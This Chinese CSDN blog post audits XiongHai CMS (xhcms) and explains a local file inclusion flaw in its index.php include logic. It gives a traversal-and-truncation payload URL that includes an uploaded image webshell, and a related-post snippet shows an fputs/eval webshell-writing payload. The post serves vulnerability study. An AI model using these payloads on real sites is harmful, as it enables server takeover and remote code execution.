$http在上传文件的同时传参数_[代码审计] xhcms 文件包含漏洞分析

最新推荐文章于 2024-05-12 20:37:13 发布
最新推荐文章于 2024-05-12 20:37:13 发布
阅读量497 收藏
点赞数
文章标签: $http在上传文件的同时传参数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42300099/article/details/112107064
版权

d4086c123203c61fbee40c6d22d6a357.png

一、初识CMS:

熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。

目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能

-目录结构:

c7963fad5e72c6e747b4891220667e86.png

二、漏洞简介:

程序直接将POST接收到的参数拼接到要包含的文件路径中,没有进行任何过滤,导致可以通过../跨目录的方式包含任意文件,并且可以通过截断绕过。

三、漏洞分析过程:

定位到:/index.php:

这里直接将GET接收到的r参数,使用addslashes()转义,然后赋值给$action,最终拼接到要包含的文件路径中,没有进行任何过滤,但是后面拼接了.php,所以要想办法将他去掉

0a04d69d45415708d4b5e6da2a3c0025.png

这里可以使用00截断、.号溢出、?方式进行截断,不过都有php版本限制,因为GET传进来的r参数是可控的,所以可以使用../跨目录包含任意文件。

漏洞部分代码:

<?php //单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET['r']); //接收文件名$action=$file==''?'index':$file; //判断为空或者等于indexinclude('files/'.$action.'.php'); //载入相应文件?>

/admin/index.php,也是一样的:

f033698753534368600e3aa388b27189.png

四、漏洞利用:

1、上传一个图片马:

访问漏洞url,构造payload:

http://www.xhcms.test/index.php?r=../conf.jpg........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

成功包含图片马,成功执行php代码,Getshell也是可以的,改一下图片马就好,这里就不演示了:

4852e1862f91f93b25d4ab7b029f104c.png

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

d8dc09494b1478d5536e9be8666b9de3.png

5ddc676065e1817e3f856e4e0e2842bf.gif

汪汪旺w
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全】xhCMS代码审计思路
HBohan的博客
11-02 1142
前言 最近想提升一下自己的代审能力,虽然之前复现分析了挺多漏洞的,TP,Laravel,Typcho,yii,但一直感觉对代码审计能力提升用处不太大,很多时候链子和利用点都非常简单,可是如何发现的这确实一个难题,所以就拿熊海CMS为例,如何自己挖它里面的漏洞,看看自己能否发现和利用,最后在和网上存在的漏洞进行对比,再看哪里没有发现,为什么没有发现,希望这也能给才入门代码审计的师傅们一点思路吧 【资料】 审计流程 先看一下入口文件index.php,这个文件一般会定义很多变量,包含很多路径,文件进来,我们只需
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
案例分析中,`xhcms`的文件包含跨站漏洞展示了如何通过URL和应用功能寻找XSS和包含漏洞;`earmusic`的文件下载漏洞说明了如何追踪数据源头并绕过过滤机制;`zzzcms`的文件删除RCE和模板解析代码执行漏洞则演示了如何...
熊海博客php版本,熊海CMS xhcms v1.0代码审计
weixin_39731922的博客
04-02 453
有空的时候就进行小型CMS的代码审计,这次审计的对象是熊海CMS v1.0本地环境安装好了之后,可以看到提示安装了锁文件说明重装漏洞应该不会存在了,这时候丢进seay代码审计系统的代码也出结果了,挨个看看//单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET[‘r‘]); //接收文件名$action=$file==‘‘?‘index‘...
文件下载漏洞案例-xhcms
最新发布
c0529的博客
05-12 380
这个漏洞严格意义上利用的条件比较苛刻,但是我们还是可以借着这个漏洞学习一下文件下载漏洞的特点。
任意文件包含漏洞(3)——实战xhcms
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-23 3670
又是一个有漏洞的cms 编码了 127.0.0.1/xhcms/?r=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>’);?> 抓包改
网安文件实战cpms、xhcms靶场
liushaojiax的博客
01-24 443
靶场链接:https://pan.baidu.com/s/1Kx883pvzdtVFubtK5QWRuw?1、搭建靶场寻找文件位置;(注:靶场是tp框架)注意:如果上不成功可以尝试关闭病毒查杀功能;点击时间发现路径的变化符合文件包含。解码查看代码可以看到确实是文件包含。3、进入后台查找文件位置;4、获取文件地址,蚁剑连接;1、搭建成功后进行访问;2、使用伪协议查看代码
XHcms
Yu3511606536的博客
06-22 830
代码审计XHcms
xhcms_2014:新华网CMS改版DEMO【依赖node-server运行】
05-14
xhcms_2014新华网CMS改版DEMO【依赖node-server运行】
94xhcms ASP(生成静态)
05-17
内容索引:ASP源码,CMS系统,94xhcms 94xhcms是基于ASP/Access/... 源码爱好者注:测试时需要先安装,安装完成后需要删除安装文件夹及所有文件,否则进入后台时一直在跳转,导致电脑很慢,同时也期待官方修正一下。
常见漏洞加固方案
09-26
常见漏洞加固方案
94xhcms v1.3
04-01
94xhcms,aspcms,小巧精致cms,值得参考学习
代码审计(xhcms一处报错注入的利用)
qq_45691294的博客
03-08 479
我们可以通过xhcms来入门代码审计,总结审计的大致思路 文章目录seay审计系统审计过程构造payloaddebug调试调整payload seay审计系统 这里先可以使用审计系统对大致可能存在的漏洞点进行一个初步的排查,误报率很高,但是可以一个一个分析来达到提高审计效率 审计过程 这里确实存在很多漏洞,但是我们重点关注一个报错注入 点击进去,观察一下具体是哪一段代码存在问题 @mysql_query($query) or die('修改错误:'.mysql_error()); 这里确实启用了错误
java 上文件_大文件分片上与极速秒实现
weixin_39902608的博客
11-21 383
为啥要有断点续统的文件输方式一旦遇到网络问题或者浏览器做重刷的话,那么对于上过程是灾难性的。那么为了解决这个问题,就出现了断点续。在之前已输的地方再接着输!今天我们这里就用springboot来实现断点续!断点续的大致流程图这里的核心在于如何分片,记录分片,然后再获取分片重新从分片处接着输!创建工程添加依赖 <dependency> ...
.net core EPPlus npoi_.NetCore3.0+Angular1.x+Epplus文件,下载
weixin_39542477的博客
11-22 253
最近在基于.Net Core3.0下文简称(Core)实践文件,先抛出引子,再分享出我的探索经过!http://Asp.Net Core文件IFormFile在 Core中,文件接收类型不再使用 HttpPostedFile 或 HttpFileCollection来接收,而是使用 IFormFile 或 IFormFileCollection来接收。—— 引其实对于对于这种方式官方在...
代码审计xhcms_v1.0
Vicl1fe的博客
02-22 1254
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 环境: cms下载地址:http://down.chinaz.com/soft/39154.htm phpstudy php 5.5.45 mysql 5.5.53 想学学代码审计。拿个小众点的来看看吧。 sql注入 安装步骤不说了,安装好后如下图。 看到这个站点就想随便点一点。,然后看看url的参数。 ...
XHCMS渗透测试
kiihuang的博客
04-01 405
熊海网站渗透测试这次是黑盒渗透测试
angular $http 输图片,以及后台接收
qq_35573456的博客
01-20 1470
这个上问题,困扰好久,首先,不使用form 表单,用$http请求 ,后台用spring 的接口接收。 前端部分: $http({         url:"url", method: 'POST', headers: { 'Content-Type': undefined }, transformRequest: function() { var formData =
gin 怎么通过 post 发送结构体_Go系列10:gin 参数绑定 单个多个 文件 图片上大法...
weixin_39944542的博客
11-21 336
Http 文件 ,或者图片上 原理浏览器网页前端单个文件多个文件gin post form参数绑定Http 文件 ,或者图片上 原理通过form Http Post 协议 multipart/form-data 上文件浏览器网页前端Go 后端我采用的Go 开发工具为Vscode 强烈推荐,并加上相关的Go插件。非常好用。 goland也是非常棒的开发工具,但是要正版,费用。 ...
xhcms csrf漏洞
09-03
同时,我也建议您在使用xhcms或其他网站建设框架时,注意及时更新和修补漏洞,以保护自己的网站安全。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值